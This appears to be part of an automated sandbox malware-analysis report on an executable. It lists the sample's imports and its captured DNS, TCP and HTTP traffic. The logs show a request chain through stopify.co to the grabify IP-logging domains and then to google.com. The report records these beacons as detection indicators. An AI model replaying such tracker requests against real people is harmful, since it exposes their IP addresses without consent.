                                                    VCRUNTIME140.dll_except_handler4_common, memset, __current_exception, _CxxThrowException, __std_exception_copy, __std_exception_destroy, __CxxFrameHandler3, memcpy, __std_terminate, __current_exception_context, memmove
                                                    api-ms-win-crt-stdio-l1-1-0.dllfwrite, _fseeki64, __p__commode, __stdio_common_vsprintf, ungetc, _set_fmode, fsetpos, _get_stream_buffer_pointers, fread, fgetc, fputc, fclose, fflush, fgetpos, setvbuf
                                                    api-ms-win-crt-utility-l1-1-0.dllrand, srand
                                                    api-ms-win-crt-runtime-l1-1-0.dll_initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, system, _set_app_type, _configure_narrow_argv, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _initialize_narrow_environment, __p___argc, __p___argv, _c_exit, _exit, terminate, _invalid_parameter_noinfo_noreturn, _seh_filter_exe, _register_thread_local_exe_atexit_callback, _controlfp_s
                                                    api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file, _lock_file
                                                    api-ms-win-crt-time-l1-1-0.dll_time64
                                                    api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                    api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, free, malloc, _callnewh
                                                    api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 24, 2024 10:54:25.107539892 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:25.107589006 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:25.107651949 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:25.122617006 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:25.122637033 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:25.759059906 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:25.759188890 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:25.849446058 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:25.849481106 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:25.850411892 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:25.850487947 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:25.853013039 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:25.896152973 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:26.187079906 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:26.187169075 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:26.187175035 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:26.187223911 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:26.202568054 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:26.202600002 CEST4434970552.173.151.229192.168.2.5
                                                    Apr 24, 2024 10:54:26.202615023 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:26.202657938 CEST49705443192.168.2.552.173.151.229
                                                    Apr 24, 2024 10:54:26.573323011 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:26.573357105 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:26.573436022 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:26.573723078 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:26.573745012 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:26.909806967 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:26.909877062 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:26.915946007 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:26.915955067 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:26.916471004 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:26.916543961 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:26.916958094 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:26.960216045 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:27.267656088 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:27.267775059 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:27.267802000 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:27.267823935 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:27.267854929 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:27.267887115 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:27.273685932 CEST49706443192.168.2.5172.67.161.186
                                                    Apr 24, 2024 10:54:27.273700953 CEST44349706172.67.161.186192.168.2.5
                                                    Apr 24, 2024 10:54:27.520581961 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:27.520622015 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:27.520726919 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:27.520977974 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:27.520993948 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:27.866992950 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:27.867078066 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:27.875940084 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:27.875977993 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:27.876373053 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:27.876446009 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:27.876905918 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:27.920161009 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:29.361062050 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:29.361171007 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:29.361197948 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:29.361247063 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:29.361259937 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:29.361308098 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:29.383624077 CEST49707443192.168.2.5104.26.8.202
                                                    Apr 24, 2024 10:54:29.383641005 CEST44349707104.26.8.202192.168.2.5
                                                    Apr 24, 2024 10:54:29.555670023 CEST4970880192.168.2.5142.251.2.101
                                                    Apr 24, 2024 10:54:29.732229948 CEST8049708142.251.2.101192.168.2.5
                                                    Apr 24, 2024 10:54:29.732397079 CEST4970880192.168.2.5142.251.2.101
                                                    Apr 24, 2024 10:54:29.732553005 CEST4970880192.168.2.5142.251.2.101
                                                    Apr 24, 2024 10:54:29.908611059 CEST8049708142.251.2.101192.168.2.5
                                                    Apr 24, 2024 10:54:30.264755964 CEST8049708142.251.2.101192.168.2.5
                                                    Apr 24, 2024 10:54:30.264858007 CEST8049708142.251.2.101192.168.2.5
                                                    Apr 24, 2024 10:54:30.264902115 CEST4970880192.168.2.5142.251.2.101
                                                    Apr 24, 2024 10:54:30.264935017 CEST4970880192.168.2.5142.251.2.101
                                                    Apr 24, 2024 10:54:30.426656008 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:54:30.606359005 CEST8049709142.250.141.104192.168.2.5
                                                    Apr 24, 2024 10:54:30.606628895 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:54:30.606769085 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:54:30.783061028 CEST8049709142.250.141.104192.168.2.5
                                                    Apr 24, 2024 10:54:30.785361052 CEST8049709142.250.141.104192.168.2.5
                                                    Apr 24, 2024 10:54:30.785445929 CEST8049709142.250.141.104192.168.2.5
                                                    Apr 24, 2024 10:54:30.785481930 CEST8049709142.250.141.104192.168.2.5
                                                    Apr 24, 2024 10:54:30.785510063 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:54:30.785510063 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:54:30.785578012 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:54:30.786602974 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:54:30.786636114 CEST4970980192.168.2.5142.250.141.104
                                                    Apr 24, 2024 10:56:14.845346928 CEST4970880192.168.2.5142.251.2.101
                                                    Apr 24, 2024 10:56:15.022663116 CEST8049708142.251.2.101192.168.2.5
                                                    Apr 24, 2024 10:56:15.022770882 CEST4970880192.168.2.5142.251.2.101

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 24, 2024 10:54:24.859664917 CEST6342953192.168.2.51.1.1.1
                                                    Apr 24, 2024 10:54:25.100843906 CEST53634291.1.1.1192.168.2.5
                                                    Apr 24, 2024 10:54:26.213804960 CEST5783953192.168.2.51.1.1.1
                                                    Apr 24, 2024 10:54:26.572402954 CEST53578391.1.1.1192.168.2.5
                                                    Apr 24, 2024 10:54:27.286824942 CEST6508253192.168.2.51.1.1.1
                                                    Apr 24, 2024 10:54:27.519793034 CEST53650821.1.1.1192.168.2.5
                                                    Apr 24, 2024 10:54:29.399130106 CEST5588553192.168.2.51.1.1.1
                                                    Apr 24, 2024 10:54:29.554784060 CEST53558851.1.1.1192.168.2.5
                                                    Apr 24, 2024 10:54:30.267817020 CEST5470753192.168.2.51.1.1.1
                                                    Apr 24, 2024 10:54:30.423854113 CEST53547071.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Apr 24, 2024 10:54:24.859664917 CEST192.168.2.51.1.1.10x8636Standard query (0)stopify.coA (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:26.213804960 CEST192.168.2.51.1.1.10x296fStandard query (0)grabify.worldA (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:27.286824942 CEST192.168.2.51.1.1.10x25f4Standard query (0)grabify.linkA (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:29.399130106 CEST192.168.2.51.1.1.10x6821Standard query (0)google.comA (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.267817020 CEST192.168.2.51.1.1.10xf4d6Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Apr 24, 2024 10:54:25.100843906 CEST1.1.1.1192.168.2.50x8636No error (0)stopify.co52.173.151.229A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:26.572402954 CEST1.1.1.1192.168.2.50x296fNo error (0)grabify.world172.67.161.186A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:26.572402954 CEST1.1.1.1192.168.2.50x296fNo error (0)grabify.world104.21.15.56A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:27.519793034 CEST1.1.1.1192.168.2.50x25f4No error (0)grabify.link104.26.8.202A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:27.519793034 CEST1.1.1.1192.168.2.50x25f4No error (0)grabify.link104.26.9.202A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:27.519793034 CEST1.1.1.1192.168.2.50x25f4No error (0)grabify.link172.67.68.246A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:29.554784060 CEST1.1.1.1192.168.2.50x6821No error (0)google.com142.251.2.101A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:29.554784060 CEST1.1.1.1192.168.2.50x6821No error (0)google.com142.251.2.102A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:29.554784060 CEST1.1.1.1192.168.2.50x6821No error (0)google.com142.251.2.139A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:29.554784060 CEST1.1.1.1192.168.2.50x6821No error (0)google.com142.251.2.100A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:29.554784060 CEST1.1.1.1192.168.2.50x6821No error (0)google.com142.251.2.113A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:29.554784060 CEST1.1.1.1192.168.2.50x6821No error (0)google.com142.251.2.138A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.104A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.103A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.147A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.105A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.99A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.106A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • stopify.co
                                                    • grabify.world
                                                    • grabify.link
                                                    • google.com
                                                    • www.google.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549708142.251.2.101805812C:\Users\user\Desktop\IPrstVM17M.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 24, 2024 10:54:29.732553005 CEST104OUTGET / HTTP/1.1
                                                    User-Agent: MyApp
                                                    Cache-Control: no-cache
                                                    Connection: Keep-Alive
                                                    Host: google.com
                                                    Apr 24, 2024 10:54:30.264755964 CEST1289INHTTP/1.1 302 Found
                                                    Location: http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                    x-hallmonitor-challenge: CgsIxpGjsQYQyY-FShIEmhBpJA
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-oMzUwDku1m5U-qeHJEjzgA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                    Date: Wed, 24 Apr 2024 08:54:30 GMT
                                                    Server: gws
                                                    Content-Length: 392
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Set-Cookie: 1P_JAR=2024-04-24-08; expires=Fri, 24-May-2024 08:54:30 GMT; path=/; domain=.google.com; Secure
                                                    Set-Cookie: AEC=AQTF6HwTd9owVavQqs-d4a4i5GnkKj6n5PU7wOsBuptkd-gSAwLkNwVVIg; expires=Mon, 21-Oct-2024 08:54:30 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                    Set-Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8; expires=Thu, 24-Oct-2024 08:54:29 GMT; path=/; domain=.googl
                                                    Data Raw:
                                                    Data Ascii:
                                                    Apr 24, 2024 10:54:30.264858007 CEST410INData Raw: 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63
                                                    Data Ascii: .com; HttpOnly<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://google.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549709142.250.141.104805812C:\Users\user\Desktop\IPrstVM17M.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 24, 2024 10:54:30.606769085 CEST466OUTGET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                    User-Agent: MyApp
                                                    Cache-Control: no-cache
                                                    Connection: Keep-Alive
                                                    Host: www.google.com
                                                    Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
                                                    Apr 24, 2024 10:54:30.785361052 CEST1289INHTTP/1.1 429 Too Many Requests
                                                    Date: Wed, 24 Apr 2024 08:54:30 GMT
                                                    Pragma: no-cache
                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Content-Type: text/html
                                                    Server: HTTP server (unknown)
                                                    Content-Length: 3040
                                                    X-XSS-Protection: 0
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 20 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 63 6f 6e 74 61 69 6e 3b 22 20 6f 6e 6c 6f 61 64 3d 22 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 27 29 3b 69 66 28 65 29 7b 65 2e 66 6f 63 75 73 28 29 3b 7d 20 69 66 28 73 6f 6c 76 65 53 69 6d 70 6c 65 43 68 61 6c 6c 65 6e 67 65 29 20 7b 73 6f 6c 76 65 53 69 6d 70 6c 65 43 68 61 6c 6c 65 6e 67 65 28 2c 29 3b 7d 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 78 2d 77 69 64 74 68 3a 34 30 30 70 78 3b 22 3e 0a 3c 68 72 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 63 63 63 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 22 3e 3c 62 72 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 63 61 70 74 63 68 61 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 69 6e 64 65 78 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 3c 6e 6f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 22 3e 0a 20 20 49 6e 20 6f 72 64 65 72 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2c 20 70 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 6a 61 76 61 73 63 72 69 70 74 20 6f 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-si
                                                    Apr 24, 2024 10:54:30.785445929 CEST1289INData Raw: 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61
                                                    Data Ascii: tekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="NDjnEWnMhmQ7wp36fB9aNpIJjS16Od5UeG1lfKw723Xwto59B308DcfrxyU40W3A1n-eBn5KqiqSyJK22NWDn_9cgkFPyl_As3_SfyVaJpZcaQPzDnShi_p6jvm9artO4yp5XSO05P-Y9E063USkGhXF5bT
                                                    Apr 24, 2024 10:54:30.785481930 CEST742INData Raw: 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e 67 20 74 68 65 20 61 62 6f 76 65 20 43 41 50 54 43 48 41
                                                    Data Ascii: ire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a script that sends automated req


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.54970552.173.151.2294435812C:\Users\user\Desktop\IPrstVM17M.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-24 08:54:25 UTC103OUTGET /news.php?tid=JBB69H.jpg HTTP/1.1
                                                    User-Agent: MyApp
                                                    Host: stopify.co
                                                    Cache-Control: no-cache
                                                    2024-04-24 08:54:26 UTC393INHTTP/1.1 302 Found
                                                    Content-Length: 0
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Date: Wed, 24 Apr 2024 08:54:26 GMT
                                                    Server: Apache
                                                    Location: https://grabify.world/news.php?tid=JBB69H.jpg
                                                    Status: 301 Moved Permanently
                                                    cf-cache-status: DYNAMIC
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    cf-ray: 56137e603e72eeba


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549706172.67.161.1864435812C:\Users\user\Desktop\IPrstVM17M.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-24 08:54:26 UTC130OUTGET /news.php?tid=JBB69H.jpg HTTP/1.1
                                                    User-Agent: MyApp
                                                    Cache-Control: no-cache
                                                    Host: grabify.world
                                                    Connection: Keep-Alive
                                                    2024-04-24 08:54:27 UTC732INHTTP/1.1 302 Moved Temporarily
                                                    Date: Wed, 24 Apr 2024 08:54:27 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 143
                                                    Connection: close
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Location: https://grabify.link/news.php?tid=JBB69H.jpg
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RRLSund%2BNlaFEd2qEGS%2Fw80oK8iiz133eoBwd8JgJTgroRrDRoHuoeVt3cxUKiNyY4C69DNMH%2BGz%2FigwhSStrQtZ4IznKPvxeOG44Nb09TughckWCWblLl2F35QPEiS"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8794de63eec27e76-LAX
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-24 08:54:27 UTC143INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>cloudflare</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.549707104.26.8.2024435812C:\Users\user\Desktop\IPrstVM17M.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-24 08:54:27 UTC129OUTGET /news.php?tid=JBB69H.jpg HTTP/1.1
                                                    User-Agent: MyApp
                                                    Cache-Control: no-cache
                                                    Connection: Keep-Alive
                                                    Host: grabify.link
                                                    2024-04-24 08:54:29 UTC1273INHTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 24 Apr 2024 08:54:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: no-cache, private
                                                    Location: http://google.com
                                                    X-Robots-Tag: noindex, nofollow
                                                    x-content-type-options: nosniff
                                                    x-abuse: abuse@grabify.link
